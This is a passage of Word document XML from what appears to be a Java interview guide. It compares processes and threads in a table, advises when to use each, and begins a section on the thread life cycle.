          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41BC7FE2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00376CCA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thread</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="6E68FD26" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71FF2241"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63D2121F"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A process is an independent program that is executed in its own memory space. It is the basic unit of execution in an operating system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D0E0881"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A thread is a lightweight sub-process that shares the same memory space with other threads of the same process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="36C9CCB7" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CC4952A"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9B3790"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Each process has its own memory space (stack, heap, etc.), so processes do not share memory with each other.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59AF57D8"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Threads share the same memory space of the parent process, meaning they share data and resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="41377298" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76BF5AC0"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26096286"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Creating a process is relatively expensive in terms of system resources, as it requires allocating separate memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51158260"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Threads are lighter and quicker to create than processes, as they share the memory space of their parent process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="1D3195E2" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07340345"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716E1D91"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Processes communicate with each other via Inter-Process Communication (IPC), which can be complex and slower (using pipes, shared memory, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28714A06"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Threads within the same process can communicate easily and quickly because they share the same memory space.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="77614E00" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="124FC071"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18967184"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Processes have higher overhead since each one has its own memory space, file descriptors, and resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8D8CD9"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Threads have lower overhead because they share memory and other resources with their parent process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="2EEC5631" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFA48CA"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC751B7"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A process runs independently and does not affect the execution of other processes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F969559"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Threads within the same process run concurrently and can affect each other due to shared memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="1B83A56B" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB36DFE"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Resource Allocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D8F7B18"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Each process has its own allocated resources such as memory, file handles, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34722F0C"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Threads share the resources allocated to the parent process.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="4863ECEB" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246DCD58"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="236B69C9"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Processes have more control over their own execution; they can run independently, and one process can terminate without affecting others.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AC5FC10"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Threads are controlled by the operating system, but they are tightly coupled to the process. If the process terminates, all its threads are also terminated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="535F9B13" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C84DDFF"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50454552"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Processes can run concurrently but are more resource-intensive and slower to switch between.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C8131C9"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Threads allow concurrent execution within a single process, making them more efficient for tasks that require shared data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="3ADFFBB0" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15CD0471"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75302309"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Processes are isolated from one another, meaning one process cannot directly interfere with another’s memory space or execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52BD151E"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Threads are not isolated; one thread can potentially affect other threads in the same process by modifying shared data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="49201C98" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DC755F8"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Context Switching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2339EC6D"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Context switching between processes is slower, as it requires switching memory contexts and updating process control blocks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="002FE991"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Context switching between threads is faster because threads share the same memory space.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376CCA" w:rsidRPr="00376CCA" w14:paraId="5394EDE9" w14:textId="77777777" w:rsidTr="00891EBF">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FF5C08B"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Fault Tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41E88E1B"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A fault or crash in one process does not directly affect other processes (unless they share resources).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A07428"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If one thread crashes, it may cause the entire process to crash, as threads share the same memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1377D326" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When to Use a Process vs. a Thread:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC0190" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use a Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5704EA52" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1078"/>
        </w:num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When tasks need complete isolation from each other (e.g., running separate applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E331D" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1078"/>
        </w:num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For running tasks that don’t require frequent communication with each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BCBE2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1078"/>
        </w:num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When the overhead of inter-process communication (IPC) is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576969C1" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use a Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AE3FD" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1078"/>
        </w:num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When tasks within the same application need to run concurrently and share data (e.g., handling multiple user requests in a web server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D91056" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1078"/>
        </w:num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When you need lightweight tasks that can be created and destroyed quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054B2A0" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1078"/>
        </w:num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When tasks need to operate in parallel within the same memory space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C556696" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D66C2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A web browser running multiple web pages or applications like Microsoft Word, which runs as a separate process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6BCF4E" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A multi-threaded web server where each request from a user is handled by a separate thread, allowing multiple requests to be processed concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FCD156" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00376CCA" w:rsidRDefault="00891EBF" w:rsidP="00376CCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376CCA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In conclusion, threads are more lightweight and efficient when multiple tasks within a single application need to run concurrently, while processes are more suitable when complete isolation between tasks is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637961F8" w14:textId="4C5005DA" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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AA30DAA">
          <v:rect id="_x0000_i1814" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D6FF6" w14:textId="77777777" w:rsidR="006E1A00" w:rsidRPr="00CE4B95" w:rsidRDefault="006E1A00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_Toc196307739"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the Thread Life Cycle?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
    </w:p>
    <w:p w14:paraId="4C8B1FA0" w14:textId="2F77C60B" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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The thread life cycle defines the various stages a thread goes through from its creation to its termination. In Java, a thread is an instance of the Thread class, and it follows a well-defined life cycle consisting of several states. These states are managed by the Java Virtual Machine (JVM) and the operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10491FA9" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="00535E02" w:rsidRDefault="00891EBF" w:rsidP="00535E02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535E02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread States:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60504466"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The thread can be in one of the following states:</w:t>
      </w:r>
    </w:p>
